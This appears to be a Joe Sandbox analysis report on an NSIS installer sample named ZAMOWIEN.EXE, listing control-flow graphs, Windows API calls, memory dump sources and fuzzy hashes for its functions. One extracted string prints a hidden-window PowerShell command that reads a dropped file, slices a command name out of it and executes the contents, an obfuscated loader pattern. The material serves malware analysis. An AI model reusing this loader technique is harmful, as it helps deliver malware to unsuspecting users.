                                                            control_flow_graph 602 404e89-404e9e 603 404f54-404f58 602->603 604 404ea4-404eb6 602->604 605 404ec1-404ecd lstrlenA 604->605 606 404eb8-404ebc call 405b9e 604->606 608 404eea-404eee 605->608 609 404ecf-404edf lstrlenA 605->609 606->605 611 404ef0-404ef7 SetWindowTextA 608->611 612 404efd-404f01 608->612 609->603 610 404ee1-404ee5 lstrcatA 609->610 610->608 611->612 613 404f03-404f45 SendMessageA * 3 612->613 614 404f47-404f49 612->614 613->614 614->603 615 404f4b-404f4e 614->615 615->603
                                                            APIs
                                                            • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                            • lstrlenA.KERNEL32(00402FA6,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                            • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00402FA6,00402FA6,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8), ref: 00404EE5
                                                            • SetWindowTextA.USER32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\), ref: 00404EF7
                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\
                                                            • API String ID: 2531174081-3441564791
                                                            • Opcode ID: ac134b0f463a41cdb5536c8e15e473aeaf7575a354ae6963c022de4564259d1a
                                                            • Instruction ID: 7724d0d97f022e048e1d2ac042b23dfd392970f5166b6a7179c12b99d94f3706
                                                            • Opcode Fuzzy Hash: ac134b0f463a41cdb5536c8e15e473aeaf7575a354ae6963c022de4564259d1a
                                                            • Instruction Fuzzy Hash: 8B216071900158BBDF019FA5CD80EDEBFB9EB45354F14807AFA44B6291C7789E84CBA8

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 616 402e6c-402e82 617 402e84 616->617 618 402e8b-402e93 616->618 617->618 619 402e95 618->619 620 402e9c-402ea1 618->620 619->620 621 402eb1-402ebe call 403072 620->621 622 402ea3-402eac call 4030a4 620->622 626 403060 621->626 627 402ec4-402ec8 621->627 622->621 628 403062-403063 626->628 629 403001-403003 627->629 630 402ece-402ef1 GetTickCount 627->630 633 40306b-40306f 628->633 631 403005-403008 629->631 632 40304d-403050 629->632 634 402ef7 630->634 635 403068 630->635 631->635 638 40300a 631->638 636 403052 632->636 637 403055-40305e call 403072 632->637 639 402efc-402f04 634->639 635->633 636->637 637->626 648 403065 637->648 641 40300f-403015 638->641 642 402f06 639->642 643 402f09-402f12 call 403072 639->643 645 403017 641->645 646 40301a-403023 call 403072 641->646 642->643 643->626 652 402f18-402f21 643->652 645->646 646->626 653 403025-403038 WriteFile 646->653 648->635 654 402f27-402f47 call 405f87 652->654 655 40303a-40303d 653->655 656 402ffd-402fff 653->656 660 402ff9-402ffb 654->660 661 402f4d-402f64 GetTickCount 654->661 655->656 659 40303f-403049 655->659 656->628 659->641 662 40304b 659->662 660->628 663 402f66-402f6e 661->663 664 402fa9-402fad 661->664 662->635 665 402f70-402f74 663->665 666 402f76-402fa1 MulDiv wsprintfA call 404e89 663->666 667 402fee-402ff1 664->667 668 402faf-402fb2 664->668 665->664 665->666 673 402fa6 666->673 667->639 669 402ff7 667->669 671 402fd4-402fdf 668->671 672 402fb4-402fc8 WriteFile 668->672 669->635 675 402fe2-402fe6 671->675 672->656 674 402fca-402fcd 672->674 673->664 674->656 676 402fcf-402fd2 674->676 675->654 677 402fec 675->677 676->675 677->635
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00402ECE
                                                            • GetTickCount.KERNEL32 ref: 00402F55
                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F82
                                                            • wsprintfA.USER32 ref: 00402F92
                                                            • WriteFile.KERNELBASE(00000000,00000000,0078F530,7FFFFFFF,00000000), ref: 00402FC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CountTick$FileWritewsprintf
                                                            • String ID: ... %d%%
                                                            • API String ID: 4209647438-2449383134
                                                            • Opcode ID: 1dae8f14a18a694b011ec5c611ec5cae49b1d039c03458204c64cac593a6103a
                                                            • Instruction ID: a0ae256f98bbca02c27974cb92508b0609fc84214e278a3d68230cc4162abf99
                                                            • Opcode Fuzzy Hash: 1dae8f14a18a694b011ec5c611ec5cae49b1d039c03458204c64cac593a6103a
                                                            • Instruction Fuzzy Hash: D6519C7190121AABCF10DF69DA48A9E7BB8BB04355F14413BF900B72C4D3789E50DBAA

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 678 401f68-401f74 679 401f7a-401f90 call 402a07 * 2 678->679 680 40202f-402031 678->680 691 401f92-401f9d GetModuleHandleA 679->691 692 401f9f-401fad LoadLibraryExA 679->692 682 40217a-40217f call 401423 680->682 688 40289c-4028ab 682->688 689 40266d-402674 682->689 689->688 691->692 694 401faf-401fbc GetProcAddress 691->694 692->694 695 402028-40202a 692->695 696 401ffb-402000 call 404e89 694->696 697 401fbe-401fc4 694->697 695->682 701 402005-402008 696->701 699 401fc6-401fd2 call 401423 697->699 700 401fdd-401ff9 697->700 699->701 710 401fd4-401fdb 699->710 700->701 701->688 704 40200e-402016 call 4035c7 701->704 704->688 709 40201c-402023 FreeLibrary 704->709 709->688 710->701
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
                                                              • Part of subcall function 00404E89: lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                              • Part of subcall function 00404E89: lstrlenA.KERNEL32(00402FA6,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                              • Part of subcall function 00404E89: lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00402FA6,00402FA6,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,0078F530,007898A8), ref: 00404EE5
                                                              • Part of subcall function 00404E89: SetWindowTextA.USER32(C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\), ref: 00404EF7
                                                              • Part of subcall function 00404E89: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                              • Part of subcall function 00404E89: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                              • Part of subcall function 00404E89: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                            Strings
                                                            • -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", xrefs: 00401FE7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                            • String ID: -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"
                                                            • API String ID: 2987980305-4136866560
                                                            • Opcode ID: 08b75e1574868f0da7fed28d1be4e55fc561b4aeb1341632199193153d569bd4
                                                            • Instruction ID: 5603d6e3752352f3426b9f4474974a0af609082b15338ddd0508423665d33cd5
                                                            • Opcode Fuzzy Hash: 08b75e1574868f0da7fed28d1be4e55fc561b4aeb1341632199193153d569bd4
                                                            • Instruction Fuzzy Hash: B3210072D04315ABCF207F64CE49A6F79B0AF45358F20423BF601B62D1D7BD49419A5E

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 711 4015b3-4015c6 call 402a07 call 4056c2 716 4015c8-4015e3 call 405654 CreateDirectoryA 711->716 717 40160a-40160d 711->717 726 401600-401608 716->726 727 4015e5-4015f0 GetLastError 716->727 719 401638-40217f call 401423 717->719 720 40160f-40162a call 401423 call 405b7c SetCurrentDirectoryA 717->720 733 40289c-4028ab 719->733 734 40266d-402674 719->734 720->733 736 401630-401633 720->736 726->716 726->717 730 4015f2-4015fb GetFileAttributesA 727->730 731 4015fd 727->731 730->726 730->731 731->726 734->733 736->733
                                                            APIs
                                                              • Part of subcall function 004056C2: CharNextA.USER32(?,?,C:\,?,0040572E,C:\,C:\,?,?,771B3410,00405479,?,C:\Users\user~1\AppData\Local\Temp\,771B3410,00000000), ref: 004056D0
                                                              • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056D5
                                                              • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056E9
                                                            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings,00000000,00000000,000000F0), ref: 00401622
                                                            Strings
                                                            • C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings, xrefs: 00401617
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings
                                                            • API String ID: 3751793516-2378692180
                                                            • Opcode ID: e641c3ae4a8681074d88b50d6396558fc33b72aaf13615055bdb6ddc820a8a0f
                                                            • Instruction ID: f6d043a697dbba063d8ca4a6451cbbc07de469f39b9323e3bb4b0ee781e04bf7
                                                            • Opcode Fuzzy Hash: e641c3ae4a8681074d88b50d6396558fc33b72aaf13615055bdb6ddc820a8a0f
                                                            • Instruction Fuzzy Hash: 9F115531908140ABDB207F745C04DBF3BB0EA66366724073FF491B22E2C63C0942862E

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 738 405859-405863 739 405864-40588f GetTickCount GetTempFileNameA 738->739 740 405891-405893 739->740 741 40589e-4058a0 739->741 740->739 742 405895 740->742 743 405898-40589b 741->743 742->743
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 0040586D
                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405887
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-2041514469
                                                            • Opcode ID: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                                            • Instruction ID: 4aebe10c88a2e36316dbf067ffd0f1b8a4e5ad9d66982a0f7a9d71ca3a6838ad
                                                            • Opcode Fuzzy Hash: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                                            • Instruction Fuzzy Hash: E3F082377083046BDB109F66DC04B9B7B9CDF95750F14C037FE44DA190D6B499548B59

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 744 401bb8-401bd0 call 4029ea * 2 749 401bd2-401bd9 call 402a07 744->749 750 401bdc-401be0 744->750 749->750 752 401be2-401be9 call 402a07 750->752 753 401bec-401bf2 750->753 752->753 756 401bf4-401c08 call 4029ea * 2 753->756 757 401c38-401c5e call 402a07 * 2 FindWindowExA 753->757 768 401c28-401c36 SendMessageA 756->768 769 401c0a-401c26 SendMessageTimeoutA 756->769 767 401c64 757->767 770 401c67-401c6a 767->770 768->767 769->770 771 401c70 770->771 772 40289c-4028ab 770->772 771->772
                                                            APIs
                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                                            • Instruction ID: 12ae1f52ecf524c97be6b8063d2fdb139482407b097923a357ceac7fbdf5fe65
                                                            • Opcode Fuzzy Hash: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                                            • Instruction Fuzzy Hash: 43219271A44248AFEF01AFB4CD8AAAE7FB5EF44348F14443EF501B61E1D6B95940DB18

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 775 405717-405732 call 405b7c call 4056c2 780 405734-405736 775->780 781 405738-405745 call 405de7 775->781 782 40578a-40578c 780->782 785 405751-405753 781->785 786 405747-40574b 781->786 788 405769-405772 lstrlenA 785->788 786->780 787 40574d-40574f 786->787 787->780 787->785 789 405774-405788 call 405629 GetFileAttributesA 788->789 790 405755-40575c call 405e80 788->790 789->782 795 405763-405764 call 405670 790->795 796 40575e-405761 790->796 795->788 796->780 796->795
                                                            APIs
                                                              • Part of subcall function 00405B7C: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B89
                                                              • Part of subcall function 004056C2: CharNextA.USER32(?,?,C:\,?,0040572E,C:\,C:\,?,?,771B3410,00405479,?,C:\Users\user~1\AppData\Local\Temp\,771B3410,00000000), ref: 004056D0
                                                              • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056D5
                                                              • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056E9
                                                            • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,771B3410,00405479,?,C:\Users\user~1\AppData\Local\Temp\,771B3410,00000000), ref: 0040576A
                                                            • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,771B3410,00405479,?,C:\Users\user~1\AppData\Local\Temp\,771B3410), ref: 0040577A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: C:\
                                                            • API String ID: 3248276644-3404278061
                                                            • Opcode ID: 5c82dc3b8e95f65848b85918bc03a8054e03177c087216e2edc28b62bc63e4a6
                                                            • Instruction ID: 2c4d446db1e29420e5923440945fccaca4e70662f99b186e828cb85218ee0e95
                                                            • Opcode Fuzzy Hash: 5c82dc3b8e95f65848b85918bc03a8054e03177c087216e2edc28b62bc63e4a6
                                                            • Instruction Fuzzy Hash: D8F0C835105D5096C72637391C49AAF1A55CE87334F5C0A3BFCA4B72D2DA3C8942EDAE
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0500,Error launching installer), ref: 00405371
                                                            • CloseHandle.KERNEL32(?), ref: 0040537E
                                                            Strings
                                                            • Error launching installer, xrefs: 0040535F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID: Error launching installer
                                                            • API String ID: 3712363035-66219284
